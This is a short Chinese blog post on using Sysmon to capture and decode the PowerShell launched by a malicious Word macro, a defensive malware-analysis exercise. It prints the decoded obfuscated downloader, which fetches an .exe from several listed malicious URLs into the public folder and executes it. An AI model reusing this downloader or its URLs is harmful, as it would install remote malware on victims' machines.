使用sysmon分析宏病毒

时间：2018-03-15 14:21:38 阅读：246 评论：0 收藏：0 [点我收藏+]

标签：rust ado 地址 SM object 技术分享 ble muse mac

样本地址：

https://www.virustotal.com/#/file/f8aede78ad92bd28f5f699b677d7d5fd362c8be846d03f009e1f04a9c3d15101/detection

混淆比较复杂，无法拿到最终执行powershell

Sysmon 默认安装

 sysmon -accepteula  –i -n

打开Doc文件，Enable Macros，执行宏，观察Sysmon日志，获得powershell命令：

技术分享图片

decode 获得明文代码：


iex($nsadasd = &(‘n‘+‘e‘+‘w-objec‘+‘t‘) random;$YYU = .(‘ne‘+‘w‘+‘-object‘) System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ‘ 
https://vegasplugg.com/BaW2l63/@http://museum-display-cases.eu/8W0D/@http://canaiskadore.com/8Y5S9/@http://kunst-t-raum-urlaub-sylt.de/0Z6zA5Y/@http://dellenmis.com/7fGM/‘.Split(‘@‘);$SDC = $env:public + ‘\‘ + $NSB + (‘.ex‘+‘e‘);foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(‘Invo‘+‘k‘+‘e-Item‘)($SDC);break;}catch{}})

End

使用sysmon分析宏病毒

标签：rust ado 地址 SM object 技术分享 ble muse mac

原文地址：https://www.cnblogs.com/xiaoxiaoleo/p/8573088.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行